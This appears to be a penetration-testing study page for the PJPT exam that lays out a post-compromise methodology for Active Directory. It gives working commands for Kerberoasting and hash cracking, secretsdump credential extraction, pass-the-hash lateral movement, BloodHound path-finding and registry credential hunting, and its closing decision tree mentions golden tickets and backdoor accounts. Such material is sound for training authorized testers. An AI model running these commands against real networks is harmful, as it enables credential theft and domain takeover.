Post-Compromise Strategy

Overview

Once you've gained initial access to a domain environment, the real work begins. This guide outlines a systematic approach to post-compromise activities, focusing on privilege escalation, lateral movement, and achieving persistent domain access.

The Question: "We have an account, now what?"

After successfully compromising an account (through password spraying, phishing, or other initial access methods), you need a structured approach to maximize the compromise and achieve your penetration testing objectives.

Phase 1: Search the Quick Wins

1. Kerberoasting

Goal: Extract service account passwords that can be cracked offline

# Using GetUserSPNs.py (Impacket)
GetUserSPNs.py domain.local/username:password -dc-ip dc_ip -request

# Using Rubeus (if you have a Windows session)
Rubeus.exe kerberoast /outfile:kerberoast_hashes.txt

# Crack the hashes
hashcat -m 13100 kerberoast_hashes.txt /usr/share/wordlists/rockyou.txt

# Expected outcomes:
# - Service account passwords
# - Potential admin-level accounts
# - Lateral movement opportunities

2. Secretsdump

Goal: Extract password hashes and secrets from accessible systems

# Basic secretsdump against domain controller
secretsdump.py domain.local/username:password@dc.domain.local

# Target specific systems where you have admin rights
secretsdump.py domain.local/username:password@target_server.domain.local

# Use extracted hashes for further attacks
secretsdump.py -hashes :ntlm_hash domain.local/username@target

# What to look for:
# - Administrator account hashes
# - Machine account hashes
# - Cached credentials
# - LSA secrets

3. Pass the Hash / Pass the Password

Goal: Use extracted credentials for lateral movement

# Pass-the-Hash with extracted NTLM hashes
psexec.py -hashes :ntlm_hash administrator@target_server.domain.local

# Pass-the-Password with cracked passwords
psexec.py domain.local/service_account:crackedpassword@target_server.domain.local

# Test credential validity across multiple systems
crackmapexec smb 192.168.1.0/24 -u username -p password
crackmapexec smb 192.168.1.0/24 -u username -H ntlm_hash

# Look for systems where you have admin rights
crackmapexec smb 192.168.1.0/24 -u username -p password --pwn3d

Quick Win Assessment Checklist

# ✅ Kerberoasting Results:
# - Did we find any crackable service account passwords?
# - Do any service accounts have admin rights?
# - Are there high-privilege service accounts (SQL, Exchange, etc.)?

# ✅ Secretsdump Results:
# - Did we extract domain admin hashes?
# - Are there any interesting machine accounts?
# - Did we find cached credentials for other users?

# ✅ Lateral Movement Results:
# - How many systems can we access with current credentials?
# - Do we have admin rights on any additional systems?
# - Can we access any servers (file servers, SQL servers, etc.)?

Phase 2: No Quick Wins? Dig Deep!

1. Enumerate with Bloodhound

Goal: Map the domain environment and find privilege escalation paths

# Collect domain data with bloodhound-python
bloodhound-python -d domain.local -u username -p password -gc dc.domain.local -c all

# Alternative: Use SharpHound from a Windows system
.\SharpHound.exe -c All -d domain.local

# Upload data to Bloodhound and analyze:
# - Pre-built queries for privilege escalation
# - Custom queries for specific attack paths
# - Group membership analysis
# - Service account identification

Key Bloodhound Queries for Post-Compromise

# Find shortest path to Domain Admins
MATCH (u:User {name:"USERNAME@DOMAIN.LOCAL"}), (g:Group {name:"DOMAIN ADMINS@DOMAIN.LOCAL"}), p=shortestPath((u)-[*1..]->(g)) RETURN p

# Find computers where user has admin rights
MATCH (u:User {name:"USERNAME@DOMAIN.LOCAL"})-[:AdminTo]->(c:Computer) RETURN c.name

# Find kerberoastable users
MATCH (u:User {hasspn:true}) RETURN u.name, u.serviceprincipalnames

# Find ASREPRoastable users
MATCH (u:User {dontreqpreauth:true}) RETURN u.name

# Find computers with unconstrained delegation
MATCH (c:Computer {unconstraineddelegation:true}) RETURN c.name

2. Analyze Account Access

Goal: Understand where your compromised account has legitimate access

# Test SMB access across the domain
crackmapexec smb domain_ips.txt -u username -p password --shares

# Check specific services
crackmapexec mssql domain_ips.txt -u username -p password
crackmapexec winrm domain_ips.txt -u username -p password
crackmapexec rdp domain_ips.txt -u username -p password

# Enumerate file shares for sensitive data
smbmap -H target_ip -u username -p password -r

# Check group memberships
net user username /domain
net group "group_name" /domain

Access Analysis Questions

# 🔍 File Server Access:
# - Can we access file servers with sensitive data?
# - Are there backup files or configuration files?
# - Do we find additional credentials in files?

# 🔍 Application Server Access:
# - Can we access SQL servers, web servers, etc.?
# - Are there application-specific vulnerabilities?
# - Can we extract application credentials or data?

# 🔍 Management System Access:
# - Can we access SCCM, backup servers, monitoring systems?
# - Do we have access to virtualization platforms?
# - Are there management scripts with embedded credentials?

3. Old Vulnerabilities Die Hard

Goal: Look for unpatched systems and legacy vulnerabilities

# Scan for common Windows vulnerabilities
nmap --script vuln -p 445 target_range

# Check for specific CVEs
crackmapexec smb target_range -u username -p password --gen-relay-list relayable_hosts.txt

# Look for older Windows versions
crackmapexec smb target_range -u username -p password | grep -E "(Windows Server 2008|Windows 7|Windows Server 2012)"

# Check for unpatched systems
wmic qfe list brief /format:table

Common Legacy Vulnerabilities to Check

# MS17-010 (EternalBlue)
# MS14-068 (Kerberos checksum validation)
# MS15-014 (Group Policy SACL)
# PrintNightmare (CVE-2021-1675/CVE-2021-34527)
# Zerologon (CVE-2020-1472)
# PetitPotam (CVE-2021-36942)

Phase 3: Think Outside the Box

Creative Enumeration Techniques

1. LDAP Enumeration for Hidden Information

# Enumerate interesting LDAP attributes
ldapsearch -x -H ldap://dc.domain.local -D "username@domain.local" -w password -b "DC=domain,DC=local" "(objectClass=user)" | grep -i description

# Look for accounts with interesting descriptions
ldapsearch -x -H ldap://dc.domain.local -D "username@domain.local" -w password -b "DC=domain,DC=local" "(&(objectClass=user)(description=*))" description sAMAccountName

# Find computers with specific operating systems
ldapsearch -x -H ldap://dc.domain.local -D "username@domain.local" -w password -b "DC=domain,DC=local" "(&(objectClass=computer)(operatingSystem=*))" operatingSystem dNSHostName

2. Credential Hunting in Unexpected Places

# Search for credentials in file shares
findstr /si password *.txt *.xml *.config *.ini
findstr /si pass *.bat *.cmd *.ps1

# Look for PowerShell history
type %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt

# Check browser saved passwords
rundll32.exe keymgr.dll,KRShowKeyMgr

# Registry credential hunting
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s

3. Living Off The Land Techniques

# Use legitimate Windows tools for enumeration
wmic computersystem get domain
wmic group list brief
wmic useraccount list brief
wmic service list brief

# PowerShell AD enumeration without additional tools
Get-ADUser -Filter * -Properties Description | Where-Object {$_.Description -ne $null}
Get-ADComputer -Filter * -Properties OperatingSystem | Where-Object {$_.OperatingSystem -like "*Server 2008*"}
Get-ADGroup -Filter * | Select-Object Name,GroupScope,GroupCategory

Strategic Decision Tree

When Quick Wins Succeed

# ✅ If Kerberoasting yields admin accounts:
# → Use for immediate domain compromise
# → Extract krbtgt hash for Golden Tickets
# → Establish persistent access

# ✅ If Secretsdump yields domain admin hashes:
# → Pass-the-Hash to Domain Controller
# → Extract NTDS.dit for complete domain compromise
# → Create additional backdoor accounts

# ✅ If lateral movement finds admin access:
# → Deploy tools on multiple systems
# → Hunt for additional credentials
# → Look for sensitive data and systems

When Deep Enumeration is Required

# 🔍 If Bloodhound shows delegation paths:
# → Target accounts with delegation rights
# → Look for S4U2Self/S4U2Proxy opportunities
# → Check for constrained/unconstrained delegation

# 🔍 If access analysis reveals interesting systems:
# → Focus on high-value targets (DCs, file servers)
# → Look for application-specific attacks
# → Hunt for backup systems and archives

# 🔍 If legacy vulnerabilities are found:
# → Exploit unpatched systems for SYSTEM access
# → Use compromised systems as pivot points
# → Extract additional credentials from memory

Post-Compromise Methodology Summary

Phase 1: Quick Assessment (15-30 minutes)

Kerberoasting - Look for weak service account passwords
Secretsdump - Extract hashes from accessible systems
Credential Testing - Test extracted credentials across domain

Phase 2: Deep Enumeration (1-2 hours)

Bloodhound Analysis - Map privilege escalation paths
Access Mapping - Understand account permissions and access
Vulnerability Scanning - Look for unpatched legacy systems

Phase 3: Creative Approaches (Ongoing)

LDAP Deep Dive - Extract hidden information from AD
Credential Hunting - Search files and registry for passwords
Living Off The Land - Use legitimate tools for enumeration

PJPT Exam Strategy

Time Management for Post-Compromise

# First 30 minutes - Quick Wins:
# - Kerberoasting all service accounts
# - Secretsdump on accessible systems
# - Credential testing with crackmapexec

# Next 60 minutes - Deep Enumeration:
# - Bloodhound data collection and analysis
# - SMB enumeration across domain
# - Application-specific enumeration

# Remaining time - Exploitation and Documentation:
# - Target highest-impact attack paths
# - Establish persistent access
# - Document all findings and attack chains

Documentation Priority

Initial Access Vector - How you gained the first account
Quick Win Results - What credentials/access you gained immediately
Privilege Escalation Path - Step-by-step path to domain admin
Lateral Movement Evidence - Systems accessed and methods used
Persistence Mechanisms - How you maintained access
Impact Assessment - What data/systems could be compromised

Remember: The goal is not just to get domain admin, but to demonstrate a complete understanding of the attack chain and the business impact of the compromise. Always think like an attacker but document like a professional penetration tester.

PreviousWindows Persistence NextWeb & Wireless

Last updated 7 months ago

hashtagOverview

hashtagThe Question: "We have an account, now what?"

hashtagPhase 1: Search the Quick Wins

hashtag1. Kerberoasting

hashtag2. Secretsdump

hashtag3. Pass the Hash / Pass the Password

hashtagQuick Win Assessment Checklist

hashtagPhase 2: No Quick Wins? Dig Deep!

hashtag1. Enumerate with Bloodhound

hashtagKey Bloodhound Queries for Post-Compromise

hashtag2. Analyze Account Access

hashtagAccess Analysis Questions

hashtag3. Old Vulnerabilities Die Hard

hashtagCommon Legacy Vulnerabilities to Check

hashtagPhase 3: Think Outside the Box

hashtagCreative Enumeration Techniques

hashtag1. LDAP Enumeration for Hidden Information

hashtag2. Credential Hunting in Unexpected Places

hashtag3. Living Off The Land Techniques

hashtagStrategic Decision Tree

hashtagWhen Quick Wins Succeed

hashtagWhen Deep Enumeration is Required

hashtagPost-Compromise Methodology Summary

hashtagPhase 1: Quick Assessment (15-30 minutes)

hashtagPhase 2: Deep Enumeration (1-2 hours)

hashtagPhase 3: Creative Approaches (Ongoing)

hashtagPJPT Exam Strategy

hashtagTime Management for Post-Compromise

hashtagDocumentation Priority